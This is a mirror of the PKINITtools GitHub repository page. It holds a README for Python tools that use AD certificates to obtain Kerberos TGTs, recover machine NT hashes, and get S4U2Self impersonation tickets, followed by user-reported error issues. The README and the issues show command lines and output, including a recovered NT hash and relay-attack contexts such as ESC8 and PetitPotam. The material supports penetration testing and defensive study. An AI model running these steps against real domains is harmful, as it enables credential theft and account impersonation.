dirkjanm / pkinittools Goto Github PK

Tools for Kerberos PKINIT and relaying to AD CS

License: MIT License

Python 100.00%

pkinittools's Introduction

PKINIT tools

This repository contains some utilities for playing with PKINIT and certificates.
The tools are built on minikerberos and impacket. Accompanying blogpost with more context: https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/

Installation

These tools are only compatible with Python 3.5+. Clone the repository from GitHub, install the dependencies and you should be good to go:

git clone https://github.com/dirkjanm/PKINITtools
pip3 install impacket minikerberos

Using a virtualenv for this is recommended.

Tools

gettgtpkinit.py

Request a TGT using a PFX file, either as file or as base64 encoded blob, or PEM files for cert+key. This uses Kerberos PKINIT and will output a TGT into the specified ccache. It will also print the AS-REP encryption key which you may need for the getnthash.py tool. Usage example:

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py -h
usage: gettgtpkinit.py [-h] [-cert-pfx file] [-pfx-pass password] [-pfx-base64 BASE64] [-cert-pem file] [-key-pem file] [-dc-ip DC_IP] [-v]
                       domain/username ccache

Requests a TGT using Kerberos PKINIT and either a PEM or PFX based certificate+key

positional arguments:
  domain/username     Domain and username in the cert
  ccache              ccache file to store the TGT in

optional arguments:
  -h, --help          show this help message and exit
  -cert-pfx file      PFX file
  -pfx-pass password  PFX file password
  -pfx-base64 BASE64  PFX file as base64 string
  -cert-pem file      Certificate in PEM format
  -key-pem file       Private key file in PEM format
  -dc-ip DC_IP        DC IP or hostname to use as KDC
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gettgtpkinit.py testsegment.local/s2019dc\$ -cert-pfx ~/impacket-py3/cert.pfx -pfx-pass hoi s2019dc.ccache
2021-07-27 21:25:24,299 minikerberos INFO     Loading certificate and key from file
2021-07-27 21:25:24,316 minikerberos INFO     Requesting TGT
2021-07-27 21:25:24,333 minikerberos INFO     AS-REP encryption key (you might need this later):
2021-07-27 21:25:24,333 minikerberos INFO     5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
2021-07-27 21:25:24,336 minikerberos INFO     Saved TGT to file

getnthash.py

Use Kerberos U2U to submit a TGS request for yourself. This will include with the PAC which in turn contains the NT hash that you can decrypt with the AS-REP key that was used for your specific TGT. It's magic really. This tool requires a TGT resulting from PKINIT to be in your KRB5CCNAME env variable. Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py -h
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

usage: getnthash.py [-h] -key KEY [-dc-ip ip address] [-debug] identity

positional arguments:
  identity           domain/username

optional arguments:
  -h, --help         show this help message and exit
  -key KEY           AS REP key from gettgtpkinit.py
  -dc-ip ip address  IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter
  -debug             Turn DEBUG output ON

(PKINITtools) user@localhost:~/PKINITtools$ export KRB5CCNAME=s2019dc.ccache
(PKINITtools) user@localhost:~/PKINITtools$ python getnthash.py testsegment.local/s2019dc\$ -key 5769dff44ebeaa5a37b4e9f7005f63063ffd7c198b747ae72021901e8063b0e3
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
fa6b130d73311d1be5495f589f9f4571

gets4uticket.py

Uses Kerberos S4U2Self to request a service ticket that is valid on the host for which you've obtained a certificate. This ticket can then be used to interact with the original host. This only requires a TGT for the machine account of this host. This TGT should be in a ccache file that you specify in the kerberos_connection_url. The only accepted kerberos_connection_url for this example is one containing a ccache file, so for example kerberos+ccache://domain.local\\victimhostname\$:[email protected]. The SPN should be a service name on the host you are impersonating, you can't use this for delegation attacks (since it does not implement S4U2Proxy, there are plenty of tools already for that). Usage:

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py -h
usage: gets4uticket.py [-h] [-v] kerberos_connection_url spn targetuser ccache

Gets an S4U2self ticket impersonating given user

positional arguments:
  kerberos_connection_url
                        the kerberos target string in the following format kerberos+ccache://domain\user:file.ccache@<domaincontroller-ip>
  spn                   the service principal in format <service>/<server-hostname>@<domain> Example: cifs/[email protected] for a
                        TGS ticket to be used for file access on server "fileserver". IMPORTANT: SERVER'S HOSTNAME MUST BE USED, NOT IP!!!
  targetuser
  ccache                ccache file to store the TGT ticket in

optional arguments:
  -h, --help            show this help message and exit
  -v, --verbose

(PKINITtools) user@localhost:~/PKINITtools$ python gets4uticket.py kerberos+ccache://testsegment.local\\s2019dc\$:[email protected] cifs/[email protected] [email protected] out.ccache -v
2021-07-28 10:09:13,687 minikerberos INFO     Trying to get SPN with [email protected] for cifs/[email protected]
2021-07-28 10:09:13,695 minikerberos INFO     Success!
2021-07-28 10:09:13,696 minikerberos INFO     Done!

License

MIT

Credits

SkelSec for minikerberos
Alberto Solino and the team at SecureAuthCorp for impacket
Mor Rubin for their first PKINIT implementation in python as part of AzureADJoinedMachinePTC
Benjamin Delpy for implementing these things in kekeo

pkinittools's People

Contributors

Stargazers

Watchers

pkinittools's Issues

AttributeError: 'str' object has no attribute 'value'

Hi,

Thank you for your effort developing this tool. I am trying to use the tool to request a TGT but it currently fails. See below for the command I used and the related error.

──(shadow)─(root💀kali)-[/home/kali/pentest/PKINITtools-master]
└─# python3 gettgtpkinit.py adlab.local/user_t_1_admins user_t_1_admins.ccache -cert-pfx /home/kali/pentest/pywhisker-main/hHKEiIIf.pfx -pfx-pass OhEKkA1wkW7FC1xUX337
2021-09-13 19:40:13,894 minikerberos INFO Loading certificate and key from file
2021-09-13 19:40:13,919 minikerberos INFO Requesting TGT
Traceback (most recent call last):
File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 349, in
main()
File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 345, in main
amain(args)
File "/home/kali/pentest/PKINITtools-master/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
raise KerberosError(krb_message)
File "/home/kali/pentest/PKINITtools-master/shadow/lib/python3.9/site-packages/minikerberos/protocol/errors.py", line 20, in init
super(Exception, self).init('%s Error Code: %d Reason: %s ' % (extra_msg, self.errorcode.value, self.errormsg.value))
AttributeError: 'str' object has no attribute 'value'

Missing minikerberos.pkinit

Python version: Python 3.9
OS: Kali Linux 2021.XX
PKINIT Status: Worked with Rubeus

I encountered the error from minikerberos.pkinit import PKINIT missing. I had installed oscrypto and minikerberos and also did python -m pip install -r requirements.txt to no avail. I tried sudo and no sudo adaptions also to no avail. In the end, I found that uninstalling minikerberos and installing from their GitHub repository succeeded.

Adding this issue to note the workaround for future reference and closing due to likely pip being out-of-date.

"Error detecting the version of libcrypto"

Hi,

Thank you for this tool.

Upon testing this today on the latest version of Kali I get the below error. I have installed PKINITools as per your instructions here. I believe that wbond/oscrypto#78 is the issue. I also reported the same issue for LdapRelayScan but the fix I found there does not work here. Perhaps because oscrypto is installed during installation of minikerberos and therefore cannot be commented out and replaced.

This is becoming an epidemic. Vital tools are no longer working.

Update 1: Found a temporary fix for this issue. After installing as per the official instructions, execute pip3 install -I git+https://github.com/wbond/oscrypto.git which will install the current master of oscrypto in which this issue is fixed.

KDC has no support for PADATA type (pre-authentication data)

when I gettgt from a certificate ,I get error show below:
python3 gettgtpkinit.py -cert-pfx ../temp/PetitPotam/host1.pfx -dc-ip 10.0.0.0.1 domain/test$ test.ccache -v 1 ⨯
2021-07-30 04:59:22,388 minikerberos INFO Loading certificate and key from file
2021-07-30 04:59:22,507 minikerberos INFO Requesting TGT
Traceback (most recent call last):
File "/home/kali/PKINITtools/gettgtpkinit.py", line 349, in
main()
File "/home/kali/PKINITtools/gettgtpkinit.py", line 345, in main
amain(args)
File "/home/kali/PKINITtools/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/usr/local/lib/python3.9/dist-packages/minikerberos-0.2.14-py3.9.egg/minikerberos/network/clientsocket.py", line 87, in sendrecv
minikerberos.protocol.errors.KerberosError: Error Code: 16 Reason: KDC has no support for PADATA type (pre-authentication data)

Error message not found! Err code: 75

i need help

proxychains4 python3 gettgtpkinit.py test.com/'DC1$' -pfx-base64 `cat DC01.pfx.b64` -pfx-pass "admin"  -dc-ip 172.16.12.8 DC01.ccache

[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
2024-01-04 11:23:56,834 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-01-04 11:23:56,853 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 349, in <module>
    main()
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/home/kali/PKINITtools-master/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75"

Short octet stream on tag decoding

The pfx I obtained using adcs esc8

proxychains4 python3 getnthash.py -key 2797e04fc0a00ce9277ff8ebcf276fe0f660158bc970d560c988a2007180a216 redteam/DC$ -dc-ip 192.168.1.1 -debug
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.12.0.dev1+20240130.154745.97007e84-py3.11.egg/impacket
[+] Using Kerberos Cache: dc.ccache
[+] SPN KRBTGT/[email protected] not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] No valid credentials found in cache. 
Traceback (most recent call last):
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 273, in <module>
    dumper.dump()
  File "/home/kali/Desktop/PKINITtools/getnthash.py", line 121, in dump
    decodedTGT = decoder.decode(tgt, asn1Spec = AS_REP())[0]
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/pyasn1/codec/ber/decoder.py", line 1337, in __call__
    raise error.SubstrateUnderrunError(
pyasn1.error.SubstrateUnderrunError: Short octet stream on tag decoding
[-] Short octet stream on tag decoding

ModuleNotFoundError: No module named 'minikerberos.common.url'

I'm getting an error similar to #6

/PKINITtools/gets4uticket.py", line 17, in <module>
    from minikerberos.common.url import KerberosClientURL, kerberos_url_help_epilog
ModuleNotFoundError: No module named 'minikerberos.common.url'

I've run pip3 install impacket minikerberos per the docs and pip3 list shows

minikerberos                   0.4.0

The command I'm attempting to execute is

┌──(venv)─(user@tehbox)-[~/PKINITtools]
└─$ KRB5CCNAME=out.ccache python3 gets4uticket.py kerberos+ccache://tehdomain.com\\tehdc\$:[email protected] cifs/[email protected] [email protected] targetuser.ccache -v

any ideas on solving this one?

I've tried uninstalling a few times, making sure its not using pip3 cache, and Ive also tried installing minikerbeos from the repo

Error Code: 62 Reason: The client trust failed or is not implemented

Hello, get this error when trying to get tgt with gettgtpkinit.py (it's ok with rubeus):

python3 gettgtpkinit.py EVIL/DC1-WS2019$ -pfx-base64 @base64Value -dc-ip 192.168.114.2 DC-WS2019.ccache

2021-11-28 04:54:42,236 minikerberos INFO Loading certificate and key from file
2021-11-28 04:54:42,314 minikerberos INFO Requesting TGT
Traceback (most recent call last):
File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 349, in
main()
File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 345, in main
amain(args)
File "/home/kali/Take and learn/PKINITtools-master/gettgtpkinit.py", line 315, in amain
res = sock.sendrecv(req)
File "/home/kali/Take and learn/MSEFSR ADCS/impacket/impacket/lib/python3.9/site-packages/minikerberos/network/clientsocket.py", line 87, in sendrecv
raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError: Error Code: 62 Reason: The client trust failed or is not implemented